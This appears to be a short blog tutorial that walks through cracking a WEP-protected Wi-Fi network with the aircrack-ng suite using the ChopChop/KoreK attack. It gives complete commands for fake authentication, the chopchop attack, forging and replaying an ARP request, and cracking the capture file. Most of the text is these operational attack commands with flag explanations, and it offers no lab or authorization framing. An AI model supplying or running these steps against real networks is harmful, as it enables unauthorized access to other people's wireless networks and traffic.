Header Ads

Cracking WEP with the CHOP CHOP/ KOREK attack ?



Advanced WEP hacking



The mighty ChopChop / Korek attack!

airmon-ng start wlan1 6

Starts Wlan1 on channel 6

airodump-ng -c 6 mon0

In this case we know that the AP is using channel 6 .. so we´re listening on channel 6

Press CTRL+C and copy AP bssid
We need our MAC-address...

macchanger -s mon0

Copy that.. This MAC you will need a couple of times

aireplay-ng -1 0 -e Test -a 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb mon0

-1 = Fake authentication
0 = Reassociation timing in seconds
-e = Target network essid
-a = acces point MAC address
-h = your card MAC adress

aireplay-ng -4 -e Test -b 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb mon0

-4 = ChopChop attack
-e = Target network essid
-h = MAC adress of associated client or from fake auth
-b Acces point MAC adress

You will be asked if you want to use "this" package. OBSERVE Dest.MAC

Dest.MAC should NOT say ff:ff:ff:ff:ff:ff (this time)

When you found the right packet, press y

[Image: wep2.jpg]

all information are saved in 2 replay files (replay_dec-1116-190213.xor and replay_dec-1116-190213.cap)

packetforge-ng -0 -a 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1116-190213.xor -w arp-request

-0 We want arp request packet generated

-a Access Point MAC address

-h Source MAC address, your MAC

-k set Destination IP

-l set Source IP

-y read PRGA from this file

-w write packet to this pcap file

Wrote packet to arp-request (file saved as arp-request)

Time to start Airodump

airodump-ng -w wifi -c 6 --bssid 00:09:5B:D9:FD:94 mon0


-w = Write to file called wifi
-c = Channel
--bssid = (MAC address of AP)

airplay-ng -2 -r arp-request mon0

-2 = Interactive packet replay
-r = used to specify a pcap file to read packets from

You will be asked if you want to use "this" package. Push "Y"

TIME TO CRACK IT

aircrack-ng wifi-01.cap

















[Image: wep3.jpg]
Powered by Blogger.